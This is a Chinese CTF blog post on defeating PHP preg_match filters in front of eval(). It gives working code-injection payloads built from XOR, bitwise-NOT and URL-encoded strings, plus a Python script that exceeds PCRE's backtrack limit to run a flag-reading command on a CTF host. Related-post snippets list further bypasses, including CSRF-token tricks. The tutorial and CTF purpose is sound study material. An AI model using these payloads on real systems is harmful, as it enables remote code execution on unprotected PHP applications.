正则绕过

最新推荐文章于 2024-06-06 11:44:03 发布
最新推荐文章于 2024-06-06 11:44:03 发布
阅读量1.3k 收藏 5
点赞数 4
分类专栏: CTF 文章标签: 正则表达式
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/v_wus/article/details/116720830
版权

正则绕过

一、preg_match()

1.异或绕过

使用异或绕过:可以使用各种特殊字符的异或构造出字母和数字

str = r"~!@#$%^&*()_+<>?,.;:-[]{}\/"

for i in range(0, len(str)):
    for j in range(0, len(str)):
        a = ord(str[i])^ord(str[j])
        print(str[i] + ' ^ ' + str[j] + ' is ' + chr(a))

在这里插入图片描述
构造phpinfo()

$_="`{{{"^"?<>/";${$_}[_]();&_=phpinfo

2.取反绕过

urlencode(~"getFlag")
输出结果为:%98%9A%8B%B9%93%9E%98
payload:?code=$_=~%98%9A%8B%B9%93%9E%98;$_();

在编码前加上 ~ 进行取反

3.取反拼接

~ 在 {} 中执行了取反操作,所以 ${~"\xa0\xb8\xba\xab"} 取反相当于 $_GET,拼接出了 $_GET’+’;,传入 +=getFlag() 从而执行了函数

payload:?code=%24%7B%7E%22%A0%B8%BA%AB%22%7D%5B%AA%5D%28%29%3B&%aa=getFlag

4.取反加中文变量

payload:?code=$啊=(%27%5D%40%5C%60%40%40%5D%27^%27%3A%25%28%26%2C%21%3A%27);$啊();

5.异或(包括变量名)

payload:?code=${"!"^"~"}="]%];,<<"^":@)}@][";${"!"^"~"}();

6.利用正则回溯最大次数上限进行绕过

PHP 为了防止正则表达式的拒绝服务攻击(reDOS),给 pcre 设定了一个回溯次数上限 pcre.backtrack_limit。我们可以通过 var_dump(ini_get(‘pcre.backtrack_limit’));的方式查看当前环境下的上限。回溯次数上限默认是 100 万。那么,假设我们的回溯次数超过了 100 万,preg_match 返回的非 1 和 0,而是 false。

import requests
payload = '{"cmd":"/bin/cat /home/rceservice/flag","test":"' + "a"*(1000000) + '"}'
res = requests.post("http://ecb402ec-0327-483b-bea3-90de34f04525.node3.buuoj.cn/", data={"cmd":payload})
#print(payload)
print(res.text)

参考:PHP利用PCRE回溯次数限制绕过某些安全限制

v_wus
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
正则
兔子零
09-09 225
/** * 邮箱 * @param {*} s */ export function isEmail (s) { return /^([a-zA-Z0-9_-])+@([a-zA-Z0-9_-])+((.[a-zA-Z0-9_-]{2,3}){1,2})$/.test(s) } /** * 手机号码 * @param {*} s */ export function isMobi...
CTF web题总结--绕过正则表达式
bob的博客
08-30 1万+
绕过正则表达式
CTF 总结02:preg_match()绕过
热门推荐
weixin_42789937的博客
01-18 1万+
preg_match()绕过,小白总结,修改过一次,后期会根据做题经历有所增补~
ctfshow-web入门-命令执行(web29)五种解法绕过文件名检测
最新发布
Welcome To Myon'Blog !
06-06 472
它的 payload 里用到了两个连续的单引号,在一些系统,连续的两个单引号会被解释为一个单引号,而不会被视为字符串的结尾,从而使得字符串拼接在一起。因此,"fl''ag.php" 被解释为 "flag.php",从而绕过对文件名的检测。第一题代码很简单,就是对 preg_match 绕过,只要提交的参数值不出现 flag 就行。这条命令的作用是输出指定文件的内容,并在每一行前面加上行号。可以看到 flag 就在当前目录下,叫 flag.php。写入成功,这里还是测了一会儿才弄好,注意对单引号的转义。
preg_match函数绕过
weixin_42478365的博客
10-10 7414
<?php error_reporting(0); if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code = $_GET['code']; if(preg_match("/[A-Za-z0-9_$@]+/",$code)){ die('fighting!'); } eval($code); } 1.绕过数字和字母 首先,我们常见的CTF题代码如下,主要是绕过数字和字
关于正则匹配preg_match(‘/^O:\d+/‘)的绕过的几种方法
m0_63138919的博客
10-13 2057
本文为preg_match('/^O:d+/')正则 匹配绕过的方法
BugkuCTF-字符?正则?,各种绕过,细心,urldecode二次编码绕过
veinard_F的博客
05-04 1539
字符?正则? 打开题目后出现一段代码 大致分析会发现需找到一个id满足前面的匹配才可以输出$key,即flag,本题主要考察有关正则表达式的内容。 “/key.*key.{4,7}key:/./(.*key)[a-z][[:punct:]]/i” 分析上述代码,首先需要一个key,而 . 表示匹配一个除换行符以外的所有字符,可以任意选择,比如a; * 表示匹配前面一个字符大于等于0次,为了简便选...
【红日Day6-CTF】PHP正则绕过
PZ的博客
01-12 2181
练习记录 复现代码: index.php // index.php <?php include 'flag.php'; if ("POST" == $_SERVER['REQUEST_METHOD']) { $password = $_POST['password']; if (0 >= preg_match('/^[[:graph:]]{12,}$/', $pass...
ctfshow萌新计划web1-5(正则匹配绕过
Welcome To Myon'Blog !
10-11 329
只是增加了下面这段代码,preg_match函数进行正则匹配,限制了我们使用 or 和 +虽然or被过滤了,但是我们可以使用符号来表示或运算,即||存在一个对id的检测,并且告诉我们flag在id=100。构造payload:?这次把除也过滤掉了,以及过滤掉了其他的一些符号。这次过滤的更多...但是它还是舍不得过滤~~~继续使用payload:?构造payload:?使用payload:?这里也没有过滤~,我们可以进行两次取反。加减乘都被过滤了,但是没有过滤除。
CTF之preg_match()函数绕过
天天学安全专属博客
03-06 4200
CTF之preg_match()函数绕过,preg_match()常用的绕过方法
关于PHP函数preg_match绕过、move_uploaded_file绕过方式以及include包含例题
Mark的博客
12-02 3285
preg_match函数定义与用法: 企业级理解: preg_match —— 执行匹配正则表达式 语法 int preg_match ( string $pattern , string KaTeX parse error: Expected 'EOF', got '&' at position 18: …bject [, array &̲matches[, int $flags = 0 [, int $offset = 0 ]]] ) $pattern: 要搜索的模式,字符串形式。
绕过preg_match
代码审计
03-21 2616
绕过preg_match <?php $input = $_GET['input']; if (preg_match("/[a-zA-Z]/", $input)) { exit("wrong"); } eval($input); 可以简单的理解preg_match("/[a-zA-Z]/" 正则表达式匹配 大小写字母符号 最终的目的是要到eval()函数去执行任意代码,这题也就是考研我们如何绕过这个preg_match。 简单来说将特殊字符通过异或的方式重组了phpinfo(); 什么是按
buuctf10(异或注入&文字符绕过preg_match&伪随机数漏洞seed)
weixin_63231007的博客
12-09 1858
在本题假如路径是/index.php/config.php,浏览器的解析结果是index.php,这样才能执行index.php的代码去包含文件,而basename会返回config.php,使得highlight_file显示出config.php的内容而不是原本的index.php,因为$_SERVER['PHP_SELF']的关系,就算后面有参数如?par=123&par2=333 而 $_SERVER[“PHP_SELF”] 的值为 /test/7ghost.php。
XCTF-攻防世界CTF平台-Web类——18、favorite_number(命令注入)(php5.5.9整数溢出、preg_match正则表达式绕过
Onlyone_1314的博客
01-15 3593
目录标题方法1:ls -i方法2:定义变量输出方法3:写到文件输出方法4:``和$()命令替换 打开题目地址: 提示了源代码,以及php版本是5.5.9 <?php //php5.5.9 $stuff = $_POST["stuff"]; $array = ['admin', 'user']; if($stuff === $array && $stuff[0] != 'admin') { $num= $_POST["num"]; if (preg_match("/^
正则绕过总结
qq_40327508的博客
09-28 7732
换行符绕过(%0a) <?php include("flag.php"); highlight_file(__FILE__); $c = $_GET['c']; if (preg_match('/^flag$/i', $c) && $c !== 'flag') { echo $flag; }else{ echo "nonono"; } 2.数组绕过 preg_match只能处理字符串,当传入的subject是数组时会返回false 3.%5c绕过 <?ph.
PHP CTF常见考题的绕过技巧
m0_48108919的博客
04-07 1万+
1.===绕过 PHP比较运算符 ===在进行比较的时候,会先判断两种字符串的类型是否相等,再比较值是否相等。 只要两边字符串类型不同会返回false
csrftoken绕过绕过正则表达式
09-08
绕过正则表达式绕过csrftoken的验证,可以采取以下几种方法: 1. 使用空referer:有些网站在进行csrf验证时会通过referer进行校验。可以将数据包的referer置为空,从而绕过referer的校验。这种方法适用于一些没有考虑到referer为空的情况或者业务需要referer为空的情况的网站。 2. 指定域绕过:在一些情况下,网站要求referer必须在特定的域下才能通过csrf验证。可以使用@符号,比如abc.com@xxx.com/poc.html,来绕过域的限制。还可以通过找到能够发布文章的子域名,将poc发布到该子域名下,诱导其他人访问来绕过csrf验证。 3. 结合其他漏洞攻击:如果是GET型的csrf,可以找到一个能够从网站内部访问POC的点,比如网站头像处设置成csrf的poc。还可以结合其他漏洞,比如任意URL跳转漏洞或XSS漏洞,来达到绕过csrf验证的目的。 总结起来,绕过正则表达式绕过csrftoken的验证可以通过使用空referer、指定域绕过或结合其他漏洞攻击等方法来实现。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

v_wus

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值